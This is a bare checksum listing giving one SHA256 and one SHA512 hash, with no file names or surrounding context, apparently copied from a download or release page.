SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a